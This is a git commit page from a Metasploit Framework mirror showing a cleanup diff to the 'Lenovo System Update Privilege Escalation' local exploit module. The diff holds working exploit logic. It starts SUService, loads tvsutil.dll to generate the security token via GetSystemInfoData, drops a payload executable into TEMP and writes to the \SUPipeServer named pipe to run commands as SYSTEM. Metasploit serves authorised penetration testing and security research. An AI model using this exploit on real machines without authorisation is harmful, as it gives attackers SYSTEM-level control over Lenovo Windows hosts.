infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do minor code cleanup

unstable
jvazquez-r7 2015-05-22 16:20:36 -05:00
parent d99eedb1e4
commit 3aa1ffb4f5
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 26 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
modules/exploits/windows/local/lenovo_systemupdate.rb
View File

@ -4,32 +4,31 @@
##
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
Rank = ExcellentRanking
def initialize(info={})
super(update_info(info, {
'Name' => 'Lenovo System Update Privilege Escalation',
'Description' => %q{
The named pipe, \SUPipeServer, can be accessed by normal users to interact
with the System update service. The service provides the possibility to execute
arbitrary commands as SYSTEM if a valid security token is provided. This token can
be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
Please note that the System Update is stopped by default but can be started/stopped calling
the Executable ConfigService.exe
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
System update service. The service provides the possibility to execute arbitrary
commands as SYSTEM if a valid security token is provided. This token can be generated
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
System Update is stopped by default but can be started/stopped calling the Executable
ConfigService.exe.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Micahel Milvich', # vulnerability discovery, advisory
'Sofiane Talmat', # vulnerability discovery, advisory
'h0ng10' # Metasploit module
'Micahel Milvich', # vulnerability discovery, advisory
'Sofiane Talmat', # vulnerability discovery, advisory
'h0ng10' # Metasploit module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local
def get_security_token(lenovo_directory)
if not client.railgun.get_dll('tvsutil') then
unless client.railgun.get_dll('tvsutil')
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
end
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
return dll_response['systeminfo'][0,40]
dll_response['systeminfo'][0,40]
end
@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local
end
su_directory = service_info('SUService')[:path][1..-16]
print_status("Starting service via ConfigService.exe")
config_service(su_directory, "start")
print_status("Giving the service some time to start...")
sleep(datastore['sleep'])
print_status('Starting service via ConfigService.exe')
config_service(su_directory, 'start')
print_status('Giving the service some time to start...')
Rex.sleep(datastore['Sleep'])
print_status("Getting security token...")
token = get_security_token(su_directory)
vprint_good("Security token is: #{token}")
if datastore['WritableDir'] and not datastore['WritableDir'].empty?
temp_dir = datastore['WritableDir']
else
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
temp_dir = get_env('TEMP')
else
temp_dir = datastore['WritableDir']
end
print_status("Using #{temp_dir} to drop malicious exe")
print_status("Using #{temp_dir} to drop the payload")
begin
cd(temp_dir)
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Failure::Unknown, 'Failed to write to pipe')
end
print_status("Stopping service via ConfigService.exe")
config_service(su_directory, "stop")
print_status('Stopping service via ConfigService.exe')
config_service(su_directory, 'stop')
end
end